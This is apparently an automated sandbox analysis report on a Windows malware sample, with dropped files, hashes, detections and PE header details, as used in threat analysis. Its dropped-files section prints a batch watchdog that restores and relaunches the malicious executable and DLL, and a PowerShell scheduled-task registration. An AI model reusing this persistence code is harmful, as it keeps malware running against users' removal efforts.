                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnp1crqm.xjy.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_slytjpn4.uls.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vj3uh0ey.5hh.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\backup.dll

                                                          Download File
                                                          Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2290968
                                                          Entropy (8bit):6.60547019861942
                                                          Encrypted:false
                                                          SSDEEP:49152:AWc2Dj3hktNUysuFDbfes+p9bZuR6c3ne3EQBSeMyWF2:Vc2Dj3hkHRsuFP2s+pvuR6c3nKEQBSef
                                                          MD5:E7E4AAF65906C66EEEA75F7AC2DF131B
                                                          SHA1:73BE791833FBB819298115C6F636C3A246C19FFD
                                                          SHA-256:C7AE0C27783E10E920CB7B0364D0990C1030584613BB96FBA95EB0FD40F52D5E
                                                          SHA-512:0F8CF7111850629BA6FAF9DFBE79389BE590EF18EFF47E78EC4322C2B2F82291BCB781F4F5C2854C603C3E74F2B7931BC30E0EA0A38A4EB505A8AEB35939E5FE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....eg...........!.........<.......!.......................................`#...........@............................0.......h..... ..H............"..)... !..0...........................b......P................................................text...m........................... ..`.rdata..._.......`..................@..@.data...@..... ..^..................@....00cfg........ ......N .............@..@.tls.......... ......P .............@....rsrc....H.... ..H...R .............@..@.reloc...0... !..2.... .............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\backup.exe

                                                          Download File
                                                          Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):777816
                                                          Entropy (8bit):6.621348016864403
                                                          Encrypted:false
                                                          SSDEEP:12288:hEj1aAa/zgWDTuE8jegvwIDMuecTenORuFjBw7oHOSgmskduZnTKVrdMujyE3e+0:ooBCoH3BdoTKxdLyAZXdOEvnBzLRUFgi
                                                          MD5:30A274E00DA842B09E9763F19777ADED
                                                          SHA1:848C6A9348020EAEEC1A5674990683A1D9977B80
                                                          SHA-256:9E65D0E8A1BE49EDE20AD53EE1CF57696C99A28D1B058A185818B58B7FD83F66
                                                          SHA-512:81DED3C48D3FFDCF82952922C4B70D5F0945B1B0D5E178A1B552C7D5E8F39D00D3E007D161A7AFBA4502CC5CB2E92DF973902D94C28DF2DE5176FD2F50DE036A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                          Joe Sandbox View:
                                                          • Filename: WiezmDFd6L.exe, Detection: malicious, Browse
                                                          • Filename: WiezmDFd6L.exe, Detection: malicious, Browse
                                                          • Filename: Fqae7BLq4m.exe, Detection: malicious, Browse
                                                          • Filename: Fqae7BLq4m.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........a............b......b.......b.................................,.................................................Rich............................PE..L.....Wg.........................................@.................................l.....@..........................................p..0...............X(.......{.. (..p...................0).......(..@............................................text............................... ..`.rdata..............................@..@.data....P.......:..................@....rsrc...0....p.......4..............@..@.reloc...{.......|...:..............@..B................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\monitor.bat

                                                          Download File
                                                          Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):788
                                                          Entropy (8bit):5.10946826685498
                                                          Encrypted:false
                                                          SSDEEP:24:NFW/WcuW/WcuWEAzWcyMZKx31SIYaYZLZ6y:NFVcuVcujAzzZKx31SIYN/6y
                                                          MD5:B8422B84DA3F3E791EAB8621899B55D1
                                                          SHA1:0214A135F224C150852D30FE9CA743585C9BB57B
                                                          SHA-256:565D247FC0F778E67EE20EC635E815D19A12DEB5FEFEC94F11274956B44C3627
                                                          SHA-512:D151F620777C5B67056A6CFEE0A88278B2E5FB9AD57DCDD80F2DFF75A801D63EBDDD6D0C74BEDAB8CBF9E8BA152EB7913F2790720AD4B73490ECD250789E7F18
                                                          Malicious:false
                                                          Preview:@echo off..:CheckProcess..set "ProcessName=RuntimeBrokers.exe"..set "ProcessPath=C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe"..set "BackupProcessPath=C:\Users\user\AppData\Local\Temp\\backup.exe"..set "DLLPath=C:\Users\Public\Bilite\Axialis\libcurl.dll"..set "BackupDLLPath=C:\Users\user\AppData\Local\Temp\\backup.dll"..if not exist "%ProcessPath%" (.. echo Process file not found, restoring from backup..... copy /Y "%BackupProcessPath%" "%ProcessPath%"..)..if not exist "%DLLPath%" (.. echo DLL file not found, restoring from backup..... copy /Y "%BackupDLLPath%" "%DLLPath%"..)..tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul..if %ERRORLEVEL% neq 0 (.. start "" "%ProcessPath%"..)..timeout /t 30 /nobreak >nul..goto CheckProcess..

                                                          C:\Users\user\AppData\Local\Temp\monitor.pid

                                                          Download File
                                                          Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):4
                                                          Entropy (8bit):2.0
                                                          Encrypted:false
                                                          SSDEEP:3:kUT:kUT
                                                          MD5:994D1CAD9132E48C993D58B492F71FC1
                                                          SHA1:F4BE7BB032D9928C79A3A14350DCE265E9FC8099
                                                          SHA-256:2CC06D8B10636615D5587D781FCB7C906D83AADF23258E78B171FC8F2C277210
                                                          SHA-512:5A1D8AEEBC3FB7F6E6156831F3DEE59D03B4CB2725E57FA24547EFB54B4516F6878E4BA17C80B0DFB6E6774D777DF2DB35B3579A4DD3263CD73E94D7D9520FEF
                                                          Malicious:false
                                                          Preview:7216

                                                          C:\Users\user\AppData\Local\updated.ps1

                                                          Download File
                                                          Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):151
                                                          Entropy (8bit):4.741657013789009
                                                          Encrypted:false
                                                          SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                          MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                          SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                          SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                          SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                          Malicious:true
                                                          Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName

                                                          C:\Users\user\Desktop\flashcenter_pp_ax_install_cn.exe.lnk

                                                          Download File
                                                          Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 26 21:13:15 2024, mtime=Thu Dec 26 21:13:15 2024, atime=Sat Nov 23 08:44:47 2024, length=6678240, window=hide
                                                          Category:dropped
                                                          Size (bytes):1141
                                                          Entropy (8bit):4.692113267581736
                                                          Encrypted:false
                                                          SSDEEP:12:8//u1SU4IXZcCHqXIQPACmq0GYSqcd+KKVElljA5C8ZpGNKVEl0avbtEw1v4t2YW:8//iM7cGVIKK+jAIRK+/vbGmJTvm
                                                          MD5:289BC6F7B4D41D1206E933AF269B7242
                                                          SHA1:3AA5CC1BBDB65EC8FC4E124986C857A4ECC2BA37
                                                          SHA-256:A70E429BD2B6536E74808E19514427005A007A7ED57A08ED08161D17DDD44F63
                                                          SHA-512:BE1CC55271CFD30D4C63B92E4ADAB2728D10C68308B9FFB21CC1D760FDAE4F4C6E18793CC770DF11896F5B470BB14F3095C6709E5F5D2A3982C49325C69B1F3D
                                                          Malicious:false
                                                          Preview:L..................F.... ......\.W....'\.W....cU.=....e..........................P.O. .:i.....+00.../C:\...................x.1....."S...Users.d......OwH.Y.......u..............:.......8.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1......Y....Public..f......O.I.Y......Du..............<.........P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....T.1......Y....Bilite..>......Y...Y......&.....................r.}.B.i.l.i.t.e.......2...e.wY.M .FLASHC~1.EXE..r......Y...Y......ZL....................$.N.f.l.a.s.h.c.e.n.t.e.r._.p.p._.a.x._.i.n.s.t.a.l.l._.c.n...e.x.e.......f...............-.......e...........f..l.....C:\Users\Public\Bilite\flashcenter_pp_ax_install_cn.exe..4.....\.....\.P.u.b.l.i.c.\.B.i.l.i.t.e.\.f.l.a.s.h.c.e.n.t.e.r._.p.p._.a.x._.i.n.s.t.a.l.l._.c.n...e.x.e..........v..*.cM.jVD.Es.!...`.......X.......116938..............n4UB.. .|..o[!.......G.P..#.....n4UB.. .|..o[!.......G.P..#.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.

                                                          C:\Users\Public\Bilite\Axialis\IiViS

                                                          Download File
                                                          Process:C:\Users\user\Desktop\CnjMEmbChO.exe
                                                          File Type:openssl enc'd data with salted password, base64 encoded
                                                          Category:dropped
                                                          Size (bytes):76
                                                          Entropy (8bit):5.471354487013932
                                                          Encrypted:false
                                                          SSDEEP:3:iqkmK2DEMpoClM+saTPyRyMHRY:ilm5YMAaTPyu
                                                          MD5:E0BAD9CEBCCDC9699E01E13A5116F071
                                                          SHA1:5A21864E5C390623A6B52054178F67611B52951D
                                                          SHA-256:6D91853D9E6DCA611D9A374D0C31A7248349F5526CE51D6A03B1BD2FB41FD513
                                                          SHA-512:809DFC6EE8AE4173FE011F19FBD6F5C6516EAEEE04DC77FE1581304B141948D989FA5C7BE02E993727E2137AFC9FFA22C0F59EBC84AD17F73F59048D34D52742
                                                          Malicious:false
                                                          Preview:U2FsdGVkX1+lTUHhfuKX513xdE7Qcgfgl3aMIFY+heLEFnJIOMsX588ejlBtuz4vIRkFb9yW/ck=

                                                          C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\CnjMEmbChO.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):777816
                                                          Entropy (8bit):6.621348016864403
                                                          Encrypted:false
                                                          SSDEEP:12288:hEj1aAa/zgWDTuE8jegvwIDMuecTenORuFjBw7oHOSgmskduZnTKVrdMujyE3e+0:ooBCoH3BdoTKxdLyAZXdOEvnBzLRUFgi
                                                          MD5:30A274E00DA842B09E9763F19777ADED
                                                          SHA1:848C6A9348020EAEEC1A5674990683A1D9977B80
                                                          SHA-256:9E65D0E8A1BE49EDE20AD53EE1CF57696C99A28D1B058A185818B58B7FD83F66
                                                          SHA-512:81DED3C48D3FFDCF82952922C4B70D5F0945B1B0D5E178A1B552C7D5E8F39D00D3E007D161A7AFBA4502CC5CB2E92DF973902D94C28DF2DE5176FD2F50DE036A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........a............b......b.......b.................................,.................................................Rich............................PE..L.....Wg.........................................@.................................l.....@..........................................p..0...............X(.......{.. (..p...................0).......(..@............................................text............................... ..`.rdata..............................@..@.data....P.......:..................@....rsrc...0....p.......4..............@..@.reloc...{.......|...:..............@..B................................................................................................................................................................................................................................................................

                                                          C:\Users\Public\Bilite\Axialis\libcurl.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\CnjMEmbChO.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2290968
                                                          Entropy (8bit):6.60547019861942
                                                          Encrypted:false
                                                          SSDEEP:49152:AWc2Dj3hktNUysuFDbfes+p9bZuR6c3ne3EQBSeMyWF2:Vc2Dj3hkHRsuFP2s+pvuR6c3nKEQBSef
                                                          MD5:E7E4AAF65906C66EEEA75F7AC2DF131B
                                                          SHA1:73BE791833FBB819298115C6F636C3A246C19FFD
                                                          SHA-256:C7AE0C27783E10E920CB7B0364D0990C1030584613BB96FBA95EB0FD40F52D5E
                                                          SHA-512:0F8CF7111850629BA6FAF9DFBE79389BE590EF18EFF47E78EC4322C2B2F82291BCB781F4F5C2854C603C3E74F2B7931BC30E0EA0A38A4EB505A8AEB35939E5FE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....eg...........!.........<.......!.......................................`#...........@............................0.......h..... ..H............"..)... !..0...........................b......P................................................text...m........................... ..`.rdata..._.......`..................@..@.data...@..... ..^..................@....00cfg........ ......N .............@..@.tls.......... ......P .............@....rsrc....H.... ..H...R .............@..@.reloc...0... !..2.... .............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\Public\Bilite\Axialis\yxhxvpke.png

                                                          Download File
                                                          Process:C:\Users\user\Desktop\CnjMEmbChO.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19985008
                                                          Entropy (8bit):7.999989782543077
                                                          Encrypted:true
                                                          SSDEEP:393216:N7Zqa2Z/TasZct6podJSPp7nf+QaXnA77T1BIfBmqZi3:DqPVTlcVShnf+QrgBmWQ
                                                          MD5:5FE2323F984A1F33A8FBC32DB8937202
                                                          SHA1:9D20C4664CB7D9AEE6429794C8ECE4420DEB4CE3
                                                          SHA-256:34B0DB3361AE9ADD45631CB88274277CE088E589332F4F6EF491EC51913BE6E9
                                                          SHA-512:98A19F12EA7BF3889FE789EBDCE2AF5C681B2F46FD595B01AE41316782A7A5B62AD23FCD7600E8FF128F55489A4B2E76F2A2C660474BE349FD70518CD3A39EAE
                                                          Malicious:false
                                                          Preview:..>.....x...@...qyPc5....<..r...MY..?D~YV.^.(O.=...p0../q"2'\.~..G&.8."N.E..........B...NQ.[.9@.C.3.F..B...j...0@..!....I.R.P.y..M4P.....n..n..uTu..1.r-....;..4.....eC)D......./.....}.'...D..@.t.?.}+.........<.....1...$=.t.A;6Lzh..3.=hb.9p...[s......W..._..`._Y...V..c..b..nq...;.s.....T......?O[r\.o......=q.....@......i.5...;..9...;...s.T]......66. ...1|.l..]]X.H....4......%m....z.....K..7...~.....+Jq.."..c.`w[.Z'.Dg;.".|. .....[..lN..~!.VNp..i....L.;......2c+...e{.F.r..4....i......4..[..bL....L .h]"/....Xo...b/.V.vy.M.UW.....Z......R....Yt......w4~.2NV......2..r.....P..d..{H.[...*.W...I.....}...ox.;&.q.......~...^.N."yh\...4...v.L.....|k.f5q.h.......D...P.o0..k.f.t.....b.5.a.H.p..a.'...E-g~..qp.,...8au...+..T....9.GO....+...lVk.."....qf..d^.F.iV..>P.....N.n..\.>U_...vU...`Q....<...%..i._..p.e.X|....,.1...Q.!....vx........11.c.'.+J...+.XE..4.l....a.*t{.GB.......nQ?:.2W...R..ar.7......E.Z.2....HK../.8V.U...?!.. (.7...S...?.#|7.A......h

                                                          C:\Users\Public\Bilite\flashcenter_pp_ax_install_cn.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\CnjMEmbChO.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):6678240
                                                          Entropy (8bit):6.624932879315099
                                                          Encrypted:false
                                                          SSDEEP:98304:qbC9JeQIeYxZWf6JA7UY4zbANqv8GD8Gb/+E258QvZwQw6:qeJCq6Govv8GD8GbPYCh6
                                                          MD5:7424FE053510D978F05F464EF34DD045
                                                          SHA1:BBC9BB0BEEDC025CED722CB7D3217DB129F1A75F
                                                          SHA-256:C2BCFCD1BAA8CC96AA6674AE8C2275ADFC1BFDEBED22BD537D44CC1C11406CA9
                                                          SHA-512:CF2DB00FB044A8049B427F193A8E6090240B0614820768AF96CF2FACDC0D62D3DC1E46B1673BFB23E84B2AE351505684A953C920B27D297A0315611EDA746509
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 11%
                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......e..!..!..!..(.T. ..(.S.5...... ...k......k.....k.....!..#..GC.."..(.C.4..GC..6..!.....GC.....GC.. ..GC.. ..GC.. ..Rich!..........................PE..L.....)g..................#...B...............#...@..........................`f.......f...@...........................,.i... h,.......-.h.1...........e.......^....@.#.8.............................).@.............#......I,......................text...N.#.......#................. ..`.rdata..i.....#.......#.............@..@.data...D.....,..~...~,.............@....rsrc...h.1...-...1...,.............@..@.reloc........^.......^.............@..B................................................................................................................................................................................................................................................................

                                                          \Device\Null

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\timeout.exe
                                                          File Type:ASCII text, with CRLF line terminators, with overstriking
                                                          Category:dropped
                                                          Size (bytes):172
                                                          Entropy (8bit):3.8842159555406113
                                                          Encrypted:false
                                                          SSDEEP:3:hYFRZARcWmFsFJQZ/ctXvY/4to/9uF8cttEfYhnQUqg2Htyst3g4t32vov:hYFRamFSQZ0lv5y/9JctESnQUq3tyMXZ
                                                          MD5:B44FC16E07912C24524F74A8D3C9BCED
                                                          SHA1:CCBA90D10D32BFF18221183C88146B378011CC3B
                                                          SHA-256:FA51D90457861D7169034A0D4122B3AFDA2B4C07E157A4C18AF06D833C96ED2A
                                                          SHA-512:1B9F0DD3387FDD1324828AA7CC94A98EC0344A5CAF1EDFFAAF7C0F98F134B09A4DCFD440E9374B0D3C80E099DFE43DABD838B0BE34C395C2F64C9334AE569516
                                                          Malicious:false
                                                          Preview:..Waiting for 30 seconds, press CTRL+C to quit .....29..28..27..26..25..24..23..22..21..20..19..18..17..16..15..14..13..12..11..10.. 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.999911659386662
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:CnjMEmbChO.exe
                                                          File size:23'595'283 bytes
                                                          MD5:6b64f2cd11ec2223c9818e0f752c649e
                                                          SHA1:99948f90acbcf025a4462f1fe49c2f6f75817fbb
                                                          SHA256:b43c39baeb60972d82f592e681f4d20aac4c4063676f34d43b10cda806d08ac6
                                                          SHA512:303338334002d22305630daea16469ed88b16a69e272f391a4c92b2353a798cb3f477f79a500a36629b1c41abcf68e0d118a72b9d5b91153a9663db0e55464a3
                                                          SSDEEP:393216:JpGdaDB9jrufnkq4MZdNHCRIKo6HQcRudv0SO2iywSQLGfVfSWun8L:XFDB9jCfnTXHCSKhHQFWSO29QsfF1
                                                          TLSH:4D373350B51352BCC78C9C3C6F5DE546A2EDAF67032A0E3B67E435ABF98068F024D466
                                                          File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................N...............0....@..........................................................................P.............................

                                                          File Icon

                                                          Icon Hash:878fd7f3b9353593

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x411def
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:
                                                          Time Stamp:0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:b5a014d7eeb4c2042897567e1288a095

                                                          Entrypoint Preview

                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          push FFFFFFFFh
                                                          push 00414C50h
                                                          push 00411F80h
                                                          mov eax, dword ptr fs:[00000000h]
                                                          push eax
                                                          mov dword ptr fs:[00000000h], esp
                                                          sub esp, 68h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          mov dword ptr [ebp-18h], esp
                                                          xor ebx, ebx
                                                          mov dword ptr [ebp-04h], ebx
                                                          push 00000002h
                                                          call dword ptr [00413184h]
                                                          pop ecx
                                                          or dword ptr [00419924h], FFFFFFFFh
                                                          or dword ptr [00419928h], FFFFFFFFh
                                                          call dword ptr [00413188h]
                                                          mov ecx, dword ptr [0041791Ch]
                                                          mov dword ptr [eax], ecx
                                                          call dword ptr [0041318Ch]
                                                          mov ecx, dword ptr [00417918h]
                                                          mov dword ptr [eax], ecx
                                                          mov eax, dword ptr [00413190h]
                                                          mov eax, dword ptr [eax]
                                                          mov dword ptr [00419920h], eax
                                                          call 00007F05FCC9FE02h
                                                          cmp dword ptr [00417710h], ebx
                                                          jne 00007F05FCC9FCEEh
                                                          push 00411F78h
                                                          call dword ptr [00413194h]
                                                          pop ecx
                                                          call 00007F05FCC9FDD4h
                                                          push 00417048h
                                                          push 00417044h
                                                          call 00007F05FCC9FDBFh
                                                          mov eax, dword ptr [00417914h]
                                                          mov dword ptr [ebp-6Ch], eax
                                                          lea eax, dword ptr [ebp-6Ch]
                                                          push eax
                                                          push dword ptr [00417910h]
                                                          lea eax, dword ptr [ebp-64h]
                                                          push eax
                                                          lea eax, dword ptr [ebp-70h]
                                                          push eax
                                                          lea eax, dword ptr [ebp-60h]
                                                          push eax
                                                          call dword ptr [0041319Ch]
                                                          push 00417040h
                                                          push 00417000h
                                                          call 00007F05FCC9FD8Ch

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x150dc0xb4.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x13c0.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x130000x310.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x113170x11400797279c5ab1a163aed1f2a528f9fe3ceFalse0.6174988677536232data6.576987441854239IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x130000x30ea0x32001359639b02bcb8f0a8743e6ead1c0030False0.43828125data5.549434098115495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x170000x292c0x8009415c9c8dea3245d6d73c23393e27d8eFalse0.431640625data3.6583182363171756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x1a0000x13c00x14005293a0fb2c46166ce21247d17e837639False0.3568359375data4.96958597460067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x1a2500x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.3709677419354839
                                                          RT_ICON0x1a5380x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.6081081081081081
                                                          RT_MENU0x1a6600x4adataEnglishUnited States0.8648648648648649
                                                          RT_DIALOG0x1a6ac0xf2dataEnglishUnited States0.7148760330578512
                                                          RT_STRING0x1a7a00x40dataEnglishUnited States0.59375
                                                          RT_GROUP_ICON0x1a7e00x22dataEnglishUnited States1.0
                                                          RT_VERSION0x1a8040x314dataEnglishUnited States0.44416243654822335
                                                          RT_MANIFEST0x1ab180x60fXML 1.0 document, ASCII text, with CRLF line terminators0.4229529335912315
                                                          RT_MANIFEST0x1b1280x298XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4894578313253012

                                                          Imports

                                                          DLLImport
                                                          COMCTL32.dll
